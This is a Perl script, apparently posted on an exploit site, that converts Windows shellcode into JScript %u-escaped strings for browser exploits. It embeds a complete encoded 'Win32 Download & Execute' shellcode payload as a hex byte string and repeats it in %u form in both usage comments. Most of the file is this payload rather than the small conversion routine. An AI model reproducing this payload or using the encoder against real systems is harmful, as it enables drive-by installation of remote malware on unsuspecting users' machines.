#!/usr/bin/perl

use strict;

# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

# Coded by pentest (security.shell@gmail.com)
# pentest..at..security-sh3ll.com
# http://security-sh3ll.com/0day/jscript.txt

# linux Usage:
# bt shellcode # ./jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# windows Usage:
# C:\Documents and Settings\pentest\Desktop>jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# your shellcode here
my $shellcode =
"\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x17".
"\x61\xc1\x92\x83\xeb\xfc\xe2\xf4\xeb\x0b\x2a\xdf\xff\x98\x3e\x6d".
"\xe8\x01\x4a\xfe\x33\x45\x4a\xd7\x2b\xea\xbd\x97\x6f\x60\x2e\x19".
"\x58\x79\x4a\xcd\x37\x60\x2a\xdb\x9c\x55\x4a\x93\xf9\x50\x01\x0b".
"\xbb\xe5\x01\xe6\x10\xa0\x0b\x9f\x16\xa3\x2a\x66\x2c\x35\xe5\xba".
"\x62\x84\x4a\xcd\x33\x60\x2a\xf4\x9c\x6d\x8a\x19\x48\x7d\xc0\x79".
"\x14\x4d\x4a\x1b\x7b\x45\xdd\xf3\xd4\x50\x1a\xf6\x9c\x22\xf1\x19".
"\x57\x6d\x4a\xe2\x0b\xcc\x4a\xd2\x1f\x3f\xa9\x1c\x59\x6f\x2d\xc2".
"\xe8\xb7\xa7\xc1\x71\x09\xf2\xa0\x7f\x16\xb2\xa0\x48\x35\x3e\x42".
"\x7f\xaa\x2c\x6e\x2c\x31\x3e\x44\x48\xe8\x24\xf4\x96\x8c\xc9\x90".
"\x42\x0b\xc3\x6d\xc7\x09\x18\x9b\xe2\xcc\x96\x6d\xc1\x32\x92\xc1".
"\x44\x22\x92\xd1\x44\x9e\x11\xfa\xd7\xc9\xc0\xd1\x71\x09\xc9\x3c".
"\x71\x32\x48\x73\x82\x09\x2d\x6b\xbd\x01\x96\x6d\xc1\x0b\xd1\xc3".
"\x42\x9e\x11\xf4\x7d\x05\xa7\xfa\x74\x0c\xab\xc2\x4e\x48\x0d\x1b".
"\xf0\x0b\x85\x1b\xf5\x50\x01\x61\xbd\xf4\x48\x6f\xe9\x23\xec\x6c".
"\x55\x4d\x4c\xe8\x2f\xca\x6a\x39\x7f\x13\x3f\x21\x01\x9e\xb4\xba".
"\xe8\xb7\x9a\xc5\x45\x30\x90\xc3\x7d\x60\x90\xc3\x42\x30\x3e\x42".
"\x7f\xcc\x18\x97\xd9\x32\x3e\x44\x7d\x9e\x3e\xa5\xe8\xb1\xa9\x75".
"\x6e\xa7\xb8\x6d\x62\x65\x3e\x44\xe8\x16\x3d\x6d\xc7\x09\x31\x18".
"\x13\x3e\x92\x6d\xc1\x9e\x11\x92";

my $jscript =convert_shellcode($shellcode);
buffer_gen($shellcode);
print $jscript;

sub generate_char()
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

sub convert_shellcode {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx < length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

sub buffer_gen(){

}